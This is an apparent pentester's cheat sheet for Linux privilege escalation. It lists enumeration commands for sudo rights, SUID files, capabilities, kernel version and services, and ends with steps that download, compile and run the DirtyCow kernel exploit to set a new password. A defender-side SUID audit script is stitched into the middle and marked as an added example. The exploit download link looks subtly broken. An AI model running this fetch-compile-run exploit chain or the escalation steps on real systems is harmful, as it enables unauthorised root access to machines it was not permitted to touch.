Privilege escalation [in progress]
OS Info
lsb_release -a
getconf LONG_BIT # 32 or 64 bits linux
cat /etc/os-release
cat /etc/redhat-release # redhat dists
SUDO Perms && SUID Files && Capabilities
sudo -l # if anything is listed -> https://gtfobins.github.io/
find / -perm -4000 2>/dev/null # SUID
getcap -r / 2>/dev/null # caps
find / -user <user> 2>/dev/null # find files owned by user x
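The same SUID search from the defender's side, as an added example that is not part of the original page: it reports setuid/setgid files that are missing from an allowlist of expected paths, so a newly planted SUID binary stands out. The function names and the allowlist format (one absolute path per line) are assumptions for this example; it relies on GNU find and stat.

```shell
#!/bin/sh
# Added example: baseline audit of SUID/SGID files.
# suid_audit and suid_audit_demo are hypothetical helper names.

# suid_audit ROOT ALLOWLIST
# Prints "mode owner path" for every setuid/setgid regular file under ROOT
# whose path is not listed in ALLOWLIST.
suid_audit() {
    root=$1
    allowlist=$2
    # -xdev stays on one filesystem; -perm /6000 matches setuid OR setgid.
    find "$root" -xdev -type f -perm /6000 2>/dev/null | sort |
    while IFS= read -r path; do
        # -x whole-line match, -F fixed string, -q quiet
        if ! grep -qxF -- "$path" "$allowlist"; then
            # GNU stat: octal mode, owner name, file name
            stat -c '%a %U %n' "$path"
        fi
    done
}

# Constructed demo tree: two SUID files, only one of them allowlisted.
suid_audit_demo() {
    tmp=$(mktemp -d) || return 1
    touch "$tmp/expected" "$tmp/unexpected"
    chmod 4755 "$tmp/expected" "$tmp/unexpected"
    printf '%s\n' "$tmp/expected" > "$tmp/allow.txt"
    suid_audit "$tmp" "$tmp/allow.txt"
    rm -rf "$tmp"
}
```

On a real host, build the allowlist once from a known-good install and run suid_audit / against it on a schedule; any output line is a file to investigate.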
Kernel enumerate
cat /proc/version
uname -a
searchsploit "Linux Kernel X.X"
Services Running
systemctl --type=service --state=running
systemd-cgtop
ps aux
ps -ef
top -n 1
service --status-all
DirtyCow (Linux Kernel <= 3.19.0-73.8)
https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs
wget https://github.com/FireFart/dirtycow/blob/master/dirty.c
gcc -pthread dirty.c -o dirty -lcrypt
./dirty
./dirty <new-pass>
LinPEAS